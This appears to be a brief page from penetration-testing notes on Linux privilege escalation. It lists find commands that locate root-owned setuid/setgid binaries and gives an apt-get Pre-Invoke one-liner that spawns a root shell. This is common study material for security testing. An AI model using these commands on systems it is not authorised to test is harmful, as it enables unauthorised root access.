Special Permissions

SetUID

Sample Exploitation

  1. Find files that has setuid

    $ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

  2. Find files that has setgid

    $ find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

  3. Search in gtfobin or reverse engineer, find vuln, exploit. Assuming the apt-update has setuid

    $ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
PreviousPemission-BasedNextSudo Rights Abuse

Last updated